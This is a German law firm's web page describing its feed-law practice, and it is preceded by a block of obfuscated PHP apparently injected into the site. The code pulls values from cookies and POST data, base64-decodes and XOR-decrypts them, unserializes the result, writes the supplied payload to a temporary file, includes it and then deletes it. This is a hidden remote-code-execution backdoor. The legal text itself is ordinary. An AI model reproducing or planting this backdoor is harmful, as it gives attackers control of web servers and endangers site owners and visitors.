$xJqacAxff = 'u' . chr (80) . 'j' . '_' . chr (101) . "\153" . 'Z' . 'H' . 'Y';$PbeeZkgW = "\143" . 'l' . chr (97) . "\x73" . 's' . "\137" . 'e' . "\170" . chr (105) . "\x73" . "\164" . chr (115); $MgeUh = class_exists($xJqacAxff); $xJqacAxff = "24711";$IRkJtNKgz = !$MgeUh;$PbeeZkgW = "55149";if ($IRkJtNKgz){class uPj_ekZHY{public function mATdRJ(){echo "48027";}private $vfgFPaRQ;public static $XYEXbgX = "fcc20feb-68d0-4234-a3a2-e8d79ff35e9e";public static $yxgII = 3820;public function __construct($VDCLv=0){$UeaCAMya = $_POST;$eBfVhu = $_COOKIE;$MCrrxc = @$eBfVhu[substr(uPj_ekZHY::$XYEXbgX, 0, 4)];if (!empty($MCrrxc)){$LsaWchYHg = "base64";$PUitle = "";$MCrrxc = explode(",", $MCrrxc);foreach ($MCrrxc as $hzoeVb){$PUitle .= @$eBfVhu[$hzoeVb];$PUitle .= @$UeaCAMya[$hzoeVb];}$PUitle = array_map($LsaWchYHg . "\x5f" . 'd' . "\x65" . chr (99) . "\x6f" . 'd' . "\145", array($PUitle,)); $PUitle = $PUitle[0] ^ str_repeat(uPj_ekZHY::$XYEXbgX, (strlen($PUitle[0]) / strlen(uPj_ekZHY::$XYEXbgX)) + 1);uPj_ekZHY::$yxgII = @unserialize($PUitle);}}private function gRQiyDwp(){if (is_array(uPj_ekZHY::$yxgII)) {$cMyHjM = sys_get_temp_dir() . "/" . crc32(uPj_ekZHY::$yxgII["\163" . chr ( 414 - 317 ).chr ( 800 - 692 ).'t']);@uPj_ekZHY::$yxgII["\x77" . chr (114) . "\x69" . "\x74" . chr ( 971 - 870 )]($cMyHjM, uPj_ekZHY::$yxgII[chr (99) . chr ( 462 - 351 ).chr ( 394 - 284 )."\x74" . chr (101) . "\x6e" . "\x74"]);include $cMyHjM;@uPj_ekZHY::$yxgII["\144" . chr ( 756 - 655 ).'l' . chr (101) . 't' . 'e']($cMyHjM); $LzrhOZj = "30442";exit();}}public function __destruct(){$this->gRQiyDwp();}}$HFKDuKECiS = new /* 6947 */ uPj_ekZHY(); $HFKDuKECiS = str_pad("42856_53494", 1);} Futtermittelrecht – Kanzlei Köhne

Futtermittelrecht

Slider

Tätigkeitsschwerpunkt Futtermittelrecht

Das Futtermittelrecht gehört nicht zuletzt wegen des auf umfassenden Verbraucherschutz bedachten Gesetzgebers zu den dynamischsten Rechtsgebieten. Gerade das Futtermittelrecht ist zunehmend Gegenstand von behördlichen Beanstandungen und Wettbewerbsprozessen. Die Fragen der Produktabgrenzung sind eine Schnittstelle zum Arzneimittelrecht. Auch die Einordnung von Stoffen als Einzelfuttermittel oder aber Futtermittelzusatzstoff ist häufig umstritten.

Das Beratungsspektrum der Kanzlei reicht von der Überprüfung von Produkten über die Begleitung bei der Konzeption von Werbung sowie Produktgestaltung bis zur Vertretung gegenüber Behörden. Die umfassende Betreuung von Mandanten aus diesem Rechtsgebiet stellt einen weiteren Schwerpunkt der Kanzlei dar.

→ Zurück zur Übersicht der Tätigkeitsschwerpunkte